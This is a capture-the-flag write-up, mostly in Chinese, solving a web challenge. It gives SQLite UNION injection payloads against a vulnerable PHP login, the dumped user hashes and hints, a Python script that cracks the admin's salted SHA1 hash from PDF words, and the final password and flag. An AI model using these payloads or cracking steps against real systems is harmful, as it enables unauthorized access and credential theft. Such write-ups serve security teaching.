SQLite injection
burte force

Task

1
2

The Professor on Flat Earth is Prof. Flux Horst. Only for bragging he made his own Blog showcasing his favorite Papers. Beeing the only Professor, he thinks he is the smartest Person arround the Plate. Can you proof him wrong and log into his Admin-Panel?
Link  https://flatscience.flatearth.fluxfingers.net/

Solution

基本功能就是，提供了一堆的paper下载。。一共有30个pdf。整个站的基本结构如下：

访问 https://flatscience.flatearth.fluxfingers.net/robots.txt 得到：

1
2
3

User-agent: *
Disallow: /login.php
Disallow: /admin.php

存在一个登陆页面： https://flatscience.flatearth.fluxfingers.net/login.php

view-source下：

访问 https://flatscience.flatearth.fluxfingers.net/login.php?debug ，得到源代码：

<?php
if(isset($_POST['usr']) && isset($_POST['pw'])){
        $user = $_POST['usr'];
        $pass = $_POST['pw'];
        $db = new SQLite3('../fancy.db');
        $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
    if($res){
        $row = $res->fetchArray();
    }
    else{
        echo "<br>Some Error occourred!";
    }
        if(isset($row['id'])){
                setcookie('name',' '.$row['name'], time() + 60, '/');
                header("Location: /");
                die();
        }
}
if(isset($_GET['debug']))
highlight_file('login.php');
?>

通过POST接收usr和pw参数。没有做任何过滤，带入sql查询。若查询的结果id字段不为空，则执行setcookie操作，会将查询的结果name字段插入到cookie中。

考虑如下数据包：

https://flatscience.flatearth.fluxfingers.net/login.php
POST:
usr=%27 UNION SELECT name, sql from sqlite_master--+&pw=chybeta

注意sqlite的注释符是--，带入查询后，sql注入的结果是：

1	SELECT id,name from Users where name=' ' UNION SELECT name, sql from sqlite_master-- and password= 'chybeta'

从and起后面部分被注释掉。利用union联合查询sqlite系统表（ sqlite_master），得到的id值其实是表的名字（name），而得到的name值其实是创建表时的语句（sql）。

即：

CREATE TABLE Users(
id int primary key,
name varchar(255),
password varchar(255),
hint varchar(255)
)

结合上面的这条语句，以及下面几条注入语句：

usr=%27 UNION SELECT id, id from Users limit 0,1--+&pw=chybeta  
usr=%27 UNION SELECT id, name from Users limit 0,1--+&pw=chybeta
usr=%27 UNION SELECT id, password from Users limit 0,1--+&pw=chybeta
usr=%27 UNION SELECT id, hint from Users limit 0,1--+&pw=chybeta

通过偏移，可以得到表中数据。

name	password	hint
admin	3fab54a50e770d830c0416df817567662a9dc85c	my fav word in my fav paper?!
fritze	54eae8935c90f467427f05e4ece82cf569f89507	my love is…?
hansi	34b0bb7c304949f9ff2fc101eef0f048be10d3bd	the password is password

直接去查没查出来。结合源码：

1	$res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");

而hint：

1	my fav word in my fav paper?!

所以将网站上所有的pdf文件下载下来（30个吧）。利用paper中的词尝试进行爆破。最后脚本如下：

from cStringIO import StringIO
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
import sys
import string
import os
import hashlib
def get_pdf():
	return [i for i in os.listdir("./") if i.endswith("pdf")]
def convert_pdf_2_text(path):
    rsrcmgr = PDFResourceManager()
    retstr = StringIO()
    device = TextConverter(rsrcmgr, retstr, codec='utf-8', laparams=LAParams())
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    with open(path, 'rb') as fp:
        for page in PDFPage.get_pages(fp, set()):
            interpreter.process_page(page)
        text = retstr.getvalue()
    device.close()
    retstr.close()
    return text
def find_password():
	pdf_path = get_pdf()
	for i in pdf_path:
		print "Searching word in " + i
		pdf_text = convert_pdf_2_text(i).split(" ")
		for word in pdf_text:
			sha1_password = hashlib.sha1(word+"Salz!").hexdigest()
			if sha1_password == '3fab54a50e770d830c0416df817567662a9dc85c':
				print "Find the password :" + word
				exit()
if __name__ == "__main__":
	find_password()

得到密码为：ThinJerboa

访问 https://flatscience.flatearth.fluxfingers.net/admin.php 登陆得到flag：

1	flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?}